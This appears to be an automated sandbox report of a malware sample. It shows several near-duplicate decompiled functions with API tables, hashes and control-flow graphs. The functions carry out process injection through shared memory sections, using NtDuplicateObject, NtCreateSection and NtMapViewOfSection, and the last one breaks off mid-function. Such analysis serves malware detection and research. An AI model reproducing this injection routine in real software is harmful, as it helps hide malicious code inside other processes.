                                                                                                    				HANDLE* _t188;
                                                                                                    				void* _t201;
                                                                                                    				void* _t202;
                                                                                                    				void* _t204;
                                                                                                    				intOrPtr* _t205;
                                                                                                    				void* _t210;
                                                                                                    
                                                                                                    				asm("repe push 0x387");
                                                                                                    				_push(0x387);
                                                                                                    				_t205 = _t204 + 4;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t175, _t210);
                                                                                                    				_t126 =  *((intOrPtr*)(_t202 + 8));
                                                                                                    				_t176 = 0;
                                                                                                    				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
                                                                                                    					if(_t86 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
                                                                                                    				_t184 = _t202 - 0x60;
                                                                                                    				 *_t184 = _t176;
                                                                                                    				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t184);
                                                                                                    				_t89 =  *_t184;
                                                                                                    				if(_t89 != 0) {
                                                                                                    					_t132 = _t202 - 0x30;
                                                                                                    					 *_t132 = _t89;
                                                                                                    					 *(_t132 + 4) = _t176;
                                                                                                    					_t186 = _t202 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t126 + 0x10))(_t186, 0x18);
                                                                                                    					 *_t186 = 0x18;
                                                                                                    					_push(_t202 - 0x30);
                                                                                                    					_push(_t186);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t202 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
                                                                                                    						 *(_t202 - 8) = _t176;
                                                                                                    						_t96 = _t202 - 0x50;
                                                                                                    						 *(_t96 + 4) = _t176;
                                                                                                    						 *_t96 = 0x5000;
                                                                                                    						_t187 = _t202 - 0x54;
                                                                                                    						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                                    							 *_t25 =  *(_t202 - 0x50);
                                                                                                    							_t120 = _t202 - 0x44;
                                                                                                    							 *_t120 = _t176;
                                                                                                    							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    								_t122 = _t202 - 0x3c;
                                                                                                    								 *_t122 = _t176;
                                                                                                    								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    									_t201 =  *(_t202 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t201, 0x104);
                                                                                                    									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                                                                    									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t98 = _t202 - 0x50;
                                                                                                    						 *(_t98 + 4) = _t176;
                                                                                                    						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                                                                    						_t188 = _t202 - 0x58;
                                                                                                    						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                                    						if (_t99 != 0) goto L63;
                                                                                                    						 *_t99 =  *_t99 + _t99;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t90 =  *_t205;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t176, _t231);
                                                                                                    				return _t90;
                                                                                                    			}
























                                                                                                    0x00401577
                                                                                                    0x00401578
                                                                                                    0x00401580
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
                                                                                                    • Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
                                                                                                    • Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
                                                                                                    • Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 96 401523-401527 97 401529-40152e 96->97 98 40159f-4015b2 call 4011f5 96->98 97->98 101 4015b4 98->101 102 4015b7-4015bc 98->102 101->102 104 4015c2-4015d3 102->104 105 4018d7-4018df 102->105 109 4018d5 104->109 110 4015d9-401602 104->110 105->102 108 4018e4-40192f call 4011f5 105->108 109->108 110->109 117 401608-40161f NtDuplicateObject 110->117 117->109 119 401625-401649 NtCreateSection 117->119 121 4016a5-4016cb NtCreateSection 119->121 122 40164b-40166c NtMapViewOfSection 119->122 121->109 126 4016d1-4016d5 121->126 122->121 125 40166e-40168a NtMapViewOfSection 122->125 125->121 128 40168c-4016a2 125->128 126->109 129 4016db-4016fc NtMapViewOfSection 126->129 128->121 129->109 131 401702-40171e NtMapViewOfSection 129->131 131->109 134 401724-40174c call 401729 131->134 134->109 134->129
                                                                                                    C-Code - Quality: 87%
                                                                                                    			E00401523(void* __eax, void* __esi, void* __eflags) {
                                                                                                    				long _t89;
                                                                                                    				long _t92;
                                                                                                    				intOrPtr _t93;
                                                                                                    				struct _GUID _t99;
                                                                                                    				long _t100;
                                                                                                    				struct _GUID _t101;
                                                                                                    				long _t102;
                                                                                                    				PVOID* _t123;
                                                                                                    				long _t124;
                                                                                                    				PVOID* _t125;
                                                                                                    				long _t126;
                                                                                                    				intOrPtr _t129;
                                                                                                    				long* _t134;
                                                                                                    				void* _t176;
                                                                                                    				struct _EXCEPTION_RECORD _t177;
                                                                                                    				struct _EXCEPTION_RECORD* _t187;
                                                                                                    				intOrPtr* _t189;
                                                                                                    				HANDLE* _t190;
                                                                                                    				HANDLE* _t191;
                                                                                                    				void* _t204;
                                                                                                    				void* _t205;
                                                                                                    				intOrPtr* _t207;
                                                                                                    
                                                                                                    				asm("outsd");
                                                                                                    				asm("out 0x70, al");
                                                                                                    				if(__eflags > 0) {
                                                                                                    					L004011F5(_t176, __eflags);
                                                                                                    					_t129 =  *((intOrPtr*)(_t205 + 8));
                                                                                                    					_t177 = 0;
                                                                                                    					 *(_t205 - 0x34) = 0;
                                                                                                    					__eflags = gs;
                                                                                                    					if(gs != 0) {
                                                                                                    						_t4 = _t205 - 0x34;
                                                                                                    						 *_t4 =  *(_t205 - 0x34) + 1;
                                                                                                    						__eflags =  *_t4;
                                                                                                    					}
                                                                                                    					while(1) {
                                                                                                    						_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                                                                                                    						__eflags = _t89;
                                                                                                    						if(_t89 != 0) {
                                                                                                    							break;
                                                                                                    						}
                                                                                                    						 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                                                                    					}
                                                                                                    					 *(_t205 - 0x5c) = _t89;
                                                                                                    					_t187 = _t205 - 0x60;
                                                                                                    					 *_t187 = _t177;
                                                                                                    					 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t187);
                                                                                                    					_t92 =  *_t187;
                                                                                                    					__eflags = _t92;
                                                                                                    					if(__eflags != 0) {
                                                                                                    						_t134 = _t205 - 0x30;
                                                                                                    						 *_t134 = _t92;
                                                                                                    						_t134[1] = _t177;
                                                                                                    						_t189 = _t205 - 0x28;
                                                                                                    						 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
                                                                                                    						 *_t189 = 0x18;
                                                                                                    						__eflags =  *((intOrPtr*)(_t129 + 0x70))(_t205 - 0x10, 0x40, _t189, _t205 - 0x30);
                                                                                                    						if(__eflags == 0) {
                                                                                                    							__eflags = NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t177, _t177, 2);
                                                                                                    							if(__eflags == 0) {
                                                                                                    								 *(_t205 - 8) = _t177;
                                                                                                    								_t99 = _t205 - 0x50;
                                                                                                    								 *(_t99 + 4) = _t177;
                                                                                                    								 *_t99 = 0x5000;
                                                                                                    								_t190 = _t205 - 0x54;
                                                                                                    								_t100 = NtCreateSection(_t190, 6, _t177, _t99, 4, 0x8000000, _t177);
                                                                                                    								__eflags = _t100;
                                                                                                    								if(_t100 == 0) {
                                                                                                    									 *_t26 =  *(_t205 - 0x50);
                                                                                                    									_t123 = _t205 - 0x44;
                                                                                                    									 *_t123 = _t177;
                                                                                                    									_t124 = NtMapViewOfSection( *_t190, 0xffffffff, _t123, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
                                                                                                    									__eflags = _t124;
                                                                                                    									if(_t124 == 0) {
                                                                                                    										_t125 = _t205 - 0x3c;
                                                                                                    										 *_t125 = _t177;
                                                                                                    										_t126 = NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t125, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
                                                                                                    										__eflags = _t126;
                                                                                                    										if(_t126 == 0) {
                                                                                                    											_t204 =  *(_t205 - 0x44);
                                                                                                    											 *((intOrPtr*)(_t129 + 0x20))(_t177, _t204, 0x104);
                                                                                                    											 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
                                                                                                    											_t38 = _t205 - 8;
                                                                                                    											 *_t38 =  *(_t205 - 8) + 1;
                                                                                                    											__eflags =  *_t38;
                                                                                                    										}
                                                                                                    									}
                                                                                                    								}
                                                                                                    								_t101 = _t205 - 0x50;
                                                                                                    								 *(_t101 + 4) = _t177;
                                                                                                    								 *_t101 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
                                                                                                    								_t191 = _t205 - 0x58;
                                                                                                    								_t102 = NtCreateSection(_t191, 0xe, _t177, _t101, 0x40, 0x8000000, _t177);
                                                                                                    								__eflags = _t102;
                                                                                                    								if (_t102 != 0) goto L60;
                                                                                                    								 *_t102 =  *_t102 + _t102;
                                                                                                    								__eflags =  *_t102;
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    					_push(0x15a4);
                                                                                                    					_t93 =  *_t207;
                                                                                                    					_push(0x83);
                                                                                                    					L004011F5(_t177, __eflags);
                                                                                                    					return _t93;
                                                                                                    				} else {
                                                                                                    					asm("popfd");
                                                                                                    					asm("repe add al, 0x9b");
                                                                                                    					asm("wait");
                                                                                                    					asm("wait");
                                                                                                    					return __esi;
                                                                                                    				}
                                                                                                    			}

























                                                                                                    0x00401523
                                                                                                    0x00401524
                                                                                                    0x00401527
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015af
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015ba
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d1
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x00401600
                                                                                                    0x00401602
                                                                                                    0x0040161d
                                                                                                    0x0040161f
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401644
                                                                                                    0x00401647
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x00401667
                                                                                                    0x0040166a
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x00401685
                                                                                                    0x00401688
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016c9
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x0040161f
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f
                                                                                                    0x00401529
                                                                                                    0x00401529
                                                                                                    0x0040152a
                                                                                                    0x0040152d
                                                                                                    0x0040152e
                                                                                                    0x0040152f
                                                                                                    0x0040152f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$CreateDuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 3617974760-0
                                                                                                    • Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
                                                                                                    • Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
                                                                                                    • Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
                                                                                                    • Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 182 40158c-4015b2 call 4011f5 186 4015b4 182->186 187 4015b7-4015bc 182->187 186->187 189 4015c2-4015d3 187->189 190 4018d7-4018df 187->190 194 4018d5 189->194 195 4015d9-401602 189->195 190->187 193 4018e4-40192f call 4011f5 190->193 194->193 195->194 202 401608-40161f NtDuplicateObject 195->202 202->194 204 401625-401649 NtCreateSection 202->204 206 4016a5-4016cb NtCreateSection 204->206 207 40164b-40166c NtMapViewOfSection 204->207 206->194 211 4016d1-4016d5 206->211 207->206 210 40166e-40168a NtMapViewOfSection 207->210 210->206 213 40168c-4016a2 210->213 211->194 214 4016db-4016fc NtMapViewOfSection 211->214 213->206 214->194 216 401702-40171e NtMapViewOfSection 214->216 216->194 219 401724-40174c call 401729 216->219 219->194 219->214
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E0040158C(void* __eax, void* __edi) {
                                                                                                    				void* _t89;
                                                                                                    				intOrPtr _t91;
                                                                                                    				struct _EXCEPTION_RECORD _t94;
                                                                                                    				intOrPtr _t95;
                                                                                                    				struct _GUID _t101;
                                                                                                    				struct _GUID _t103;
                                                                                                    				long _t104;
                                                                                                    				PVOID* _t125;
                                                                                                    				PVOID* _t127;
                                                                                                    				intOrPtr _t131;
                                                                                                    				struct _EXCEPTION_RECORD* _t136;
                                                                                                    				void* _t180;
                                                                                                    				struct _EXCEPTION_RECORD _t181;
                                                                                                    				struct _EXCEPTION_RECORD* _t189;
                                                                                                    				intOrPtr* _t191;
                                                                                                    				HANDLE* _t192;
                                                                                                    				HANDLE* _t193;
                                                                                                    				void* _t206;
                                                                                                    				void* _t207;
                                                                                                    				void* _t208;
                                                                                                    				void* _t210;
                                                                                                    				intOrPtr* _t211;
                                                                                                    				intOrPtr _t216;
                                                                                                    
                                                                                                    				_t211 = _t210 + 1;
                                                                                                    				asm("clc");
                                                                                                    				asm("stc");
                                                                                                    				_t89 = _t207;
                                                                                                    				_t208 = __eax;
                                                                                                    				_t180 = __edi - 1;
                                                                                                    				_t2 = _t89 - 0x7d;
                                                                                                    				 *_t2 =  *((intOrPtr*)(_t89 - 0x7d));
                                                                                                    				_t216 =  *_t2;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t180, _t216);
                                                                                                    				_t131 =  *((intOrPtr*)(__eax + 8));
                                                                                                    				_t181 = 0;
                                                                                                    				 *((intOrPtr*)(__eax - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(__eax - 0x34)) =  *((intOrPtr*)(__eax - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t91 =  *((intOrPtr*)(_t131 + 0x48))();
                                                                                                    					if(_t91 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t208 - 0x5c)) = _t91;
                                                                                                    				_t189 = _t208 - 0x60;
                                                                                                    				 *_t189 = _t181;
                                                                                                    				 *((intOrPtr*)(_t131 + 0x4c))(_t91, _t189);
                                                                                                    				_t94 =  *_t189;
                                                                                                    				if(_t94 != 0) {
                                                                                                    					_t136 = _t208 - 0x30;
                                                                                                    					 *_t136 = _t94;
                                                                                                    					 *(_t136 + 4) = _t181;
                                                                                                    					_t191 = _t208 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t131 + 0x10))(_t191, 0x18);
                                                                                                    					 *_t191 = 0x18;
                                                                                                    					_push(_t208 - 0x30);
                                                                                                    					_push(_t191);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t208 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t181, _t181, 2) == 0) {
                                                                                                    						 *(_t208 - 8) = _t181;
                                                                                                    						_t101 = _t208 - 0x50;
                                                                                                    						 *(_t101 + 4) = _t181;
                                                                                                    						 *_t101 = 0x5000;
                                                                                                    						_t192 = _t208 - 0x54;
                                                                                                    						if(NtCreateSection(_t192, 6, _t181, _t101, 4, 0x8000000, _t181) == 0) {
                                                                                                    							 *_t28 =  *(_t208 - 0x50);
                                                                                                    							_t125 = _t208 - 0x44;
                                                                                                    							 *_t125 = _t181;
                                                                                                    							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
                                                                                                    								_t127 = _t208 - 0x3c;
                                                                                                    								 *_t127 = _t181;
                                                                                                    								if(NtMapViewOfSection( *_t192,  *(_t208 - 0xc), _t127, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
                                                                                                    									_t206 =  *(_t208 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t131 + 0x20))(_t181, _t206, 0x104);
                                                                                                    									 *((intOrPtr*)(_t206 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
                                                                                                    									 *(_t208 - 8) =  *(_t208 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t103 = _t208 - 0x50;
                                                                                                    						 *(_t103 + 4) = _t181;
                                                                                                    						 *_t103 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
                                                                                                    						_t193 = _t208 - 0x58;
                                                                                                    						_t104 = NtCreateSection(_t193, 0xe, _t181, _t103, 0x40, 0x8000000, _t181);
                                                                                                    						if (_t104 != 0) goto L60;
                                                                                                    						 *_t104 =  *_t104 + _t104;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t95 =  *_t211;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t181, _t237);
                                                                                                    				return _t95;
                                                                                                    			}


























                                                                                                    0x0040158c
                                                                                                    0x0040158d
                                                                                                    0x0040158e
                                                                                                    0x0040158f
                                                                                                    0x0040158f
                                                                                                    0x00401590
                                                                                                    0x00401591
                                                                                                    0x00401591
                                                                                                    0x00401591
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
                                                                                                    • Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
                                                                                                    • Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
                                                                                                    • Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 223 401585-4015b2 call 4011f5 230 4015b4 223->230 231 4015b7-4015bc 223->231 230->231 233 4015c2-4015d3 231->233 234 4018d7-4018df 231->234 238 4018d5 233->238 239 4015d9-401602 233->239 234->231 237 4018e4-40192f call 4011f5 234->237 238->237 239->238 246 401608-40161f NtDuplicateObject 239->246 246->238 248 401625-401649 NtCreateSection 246->248 250 4016a5-4016cb NtCreateSection 248->250 251 40164b-40166c NtMapViewOfSection 248->251 250->238 255 4016d1-4016d5 250->255 251->250 254 40166e-40168a NtMapViewOfSection 251->254 254->250 257 40168c-4016a2 254->257 255->238 258 4016db-4016fc NtMapViewOfSection 255->258 257->250 258->238 260 401702-40171e NtMapViewOfSection 258->260 260->238 263 401724-40174c call 401729 260->263 263->238 263->258
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E00401585() {
                                                                                                    				intOrPtr _t86;
                                                                                                    				struct _EXCEPTION_RECORD _t89;
                                                                                                    				intOrPtr _t90;
                                                                                                    				struct _GUID _t96;
                                                                                                    				struct _GUID _t98;
                                                                                                    				long _t99;
                                                                                                    				PVOID* _t120;
                                                                                                    				PVOID* _t122;
                                                                                                    				intOrPtr _t126;
                                                                                                    				struct _EXCEPTION_RECORD* _t132;
                                                                                                    				void* _t175;
                                                                                                    				struct _EXCEPTION_RECORD _t176;
                                                                                                    				struct _EXCEPTION_RECORD* _t185;
                                                                                                    				intOrPtr* _t187;
                                                                                                    				HANDLE* _t188;
                                                                                                    				HANDLE* _t189;
                                                                                                    				void* _t202;
                                                                                                    				void* _t203;
                                                                                                    				void* _t205;
                                                                                                    				intOrPtr* _t206;
                                                                                                    				void* _t211;
                                                                                                    
                                                                                                    				_push(0x387);
                                                                                                    				_t206 = _t205 + 4;
                                                                                                    				_push(0x83);
